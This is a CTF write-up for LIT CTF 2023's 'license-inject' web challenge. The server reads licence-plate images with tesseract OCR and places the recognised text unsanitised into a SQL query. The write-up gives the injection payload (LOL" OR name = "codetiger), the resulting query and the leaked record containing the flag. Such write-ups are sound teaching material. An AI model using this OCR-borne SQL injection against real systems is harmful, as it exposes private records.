LIT CTF 2023 - license-inject

Posted Aug 7, 2023

By Nolliv22 1 min read

Description

Category: Web

i did a thing

player.zip

Resolution

1. Overview

First thing we did was to find in which souce file the flag was:

        
$ grep -rna 'LITCTF'
src/routes/api/+server.ts:137:							fine: 'LITCTF{redacted}'

To summarize:

the webapp stores cars plate along with a name and a fine in a SQL database:

        
      
CREATE TABLE IF NOT EXISTS plates (name TEXT, plate string, fine TEXT, PRIMARY KEY (name))

the flag is the fine of someone called codetiger:

        
      
plates.push({
name: 'codetiger',
// very long random string
plate: Array(40)
  .fill('')
  .map(() => 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'[Math.floor(Math.random() * 36)])
  .join(''),
fine: 'LITCTF{redacted}'
});

we can upload picture of a plate to access to all the information about this plate.
the server uses tesseract to recognize text in the picture.

2. SQL Injection

There is an input used for SQL query which is not sanitized: text.

        
      
SELECT * FROM plates WHERE plate = "${text}"

text is the recognized text using tesseract.

We need to perform SQL inject though plate picture.

Here is the injection: LOL" OR name = "codetiger and the query becomes:

        
      
SELECT * FROM plates WHERE plate = "LOL" OR name = "codetiger"

We generate the picture using any drawing software:

We upload it and we get all information about codetiger:

{"name":"codetiger","plate":"WDS9XEH7SLYV7G72E0U902ID81XN2Q9SUBWUYK6H","fine":"LITCTF{cant_escape_codetiger}"}

and the flag: LITCTF{cant_escape_codetiger}.

Writeups, LIT CTF 2023

Web

This post is licensed under CC BY 4.0 by the author.